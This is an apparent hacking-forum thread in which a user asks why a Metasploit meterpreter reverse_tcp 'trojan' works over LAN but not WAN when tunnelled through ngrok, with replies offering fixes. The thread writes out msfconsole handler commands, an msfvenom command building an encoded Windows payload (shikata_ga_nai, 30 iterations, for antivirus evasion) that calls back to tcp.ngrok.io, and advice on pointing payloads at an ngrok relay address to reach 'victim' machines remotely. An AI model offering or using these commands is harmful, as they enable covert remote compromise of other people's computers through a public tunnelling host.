Hi guys, I've been struggling with Kali Linux WAN hacking for a time. My router has virtual server settings but doesn't support port forwarding so I got hands on ngrok. Ngrok works great but I want to run it on a different machine.
First know that I will be using here three different network connections; 1. my home wifi connection on which I have kali linux, 2. ethernet connection on which I ran ngrok, 3.mobile hotspot connection on my another computer (to get a wan situation like a victim computer).
I ran ngrok on windows maching with network no 2(ethernet connection) using the auth key of my ngrok account with command:
ngrok tcp 192.168.xxx.xxx:4444 (here the IP I used was inet address which I got from ifconfig wlan0 in kali linux )
Then I created a windows payload on kali linux with LHOST=(ngrok ip, got it from pinging the ngrok address) and LPORT=4444. After creating payload I transferred it to my computer with network no 3 ( nother-different computer connected to my mobile hotspot note: not the computer on which I ran ngrok)
Finally I opened msfconsole and ran the following commands:
**use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.xxx.xxx(the same inet address of kali linux which I used in ngrok for forwarding)
set LPORT 4444
exploit**
Then I ran the trojan payload on my computer running on network 2(mobile hotpsot), and it didn't work. No session opened. Then I changed the network from hotspot to my home internet (wifi, network # 1, the same net on which I run kali linux) and guess what? It worked. A session opened but this is LAN.. isn't it?
I want WAN hacking to be done. I don't know were I did wrong. Can anyone please solve this mystery for me. Maybe I'm supposed to use my wan ip or gateway ip, I don't know. Can anyone help ??
9 Responses
Hi, I saw you sending me a email, so I am replying.
You will need to buy a wireless adapter.
There are lots of fake tutorials on youtube, it says install compat-wireless from october 26th and blablabla...
I tried it, but it will not work.
My suggestion is buying one.
I know you are desperate, so i will upload this fast.
I will find a good article that shows some good wireless- adapters..
These are some good and cheap wireless adapters :
https://null-byte.wonderhowto.com/how-to/buy-best-wireless-network-adapter-for-wi-fi-hacking-2017-0178550/
I don't have money to buy and I don't want to. I use 4g wifi wireless device for internet. Is there any solution you know of the problem with ngrok I'm facing?
Haha, I agree. I also don't buy those, but if you want it desperately,try installing kali on a computer, not a virtual machine.
spend 10$ for a tp link high gain usb adapter if you want it on virtual box.
The Model Name is = TP LINK TL WN722N HIGH GAIN
I had similar Problems , What worked for me is
Use reverse_tcp_dns or reverse_https payload
For your case
For Opening Ngrok : - ngrok tcp 4444
Creating Payload :-
msfvenom -p windows/meterpreter/reversetcpdns LHOST=tcp.ngrok.io LPORT=Your Port Assigned by Ngrok* -e x86/shikataganai -i 30 -f exe -o payload.exe .
In Msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_dns
set LHOST 0.0.0.0
set LPORT 4444
exploit*
Now I hope you will get connection .
I think you didn't understand it correctly. I'm not running ngrok on my local machine. I want to run ngrok on different machine, lets say a cloud machine which will be used for port forwarding for wan hacking. Can you please tell me the solution.
Yeah don't go out and buy anything new!!
Hacking over WAN is much much trickier than over LAN and the vast maj of tutorials assume you're hacking within LAN.
Here's where you're going wrong--
When you start your ngrok, don't include any ip at all. Just run
ngrok tcp 4444 (or whatever port you want)
Set your payload to connect back to you at the url and port number ngrok gives you. In my case it'd be tcp://0.tcp.ngrok.io:12281
Can we prevent the port no from changing (the port assigned by ngrok) cz I HV to create a New payload everytime I close ngrok (as the port no varies the payload created is no more useful)
Share Your Thoughts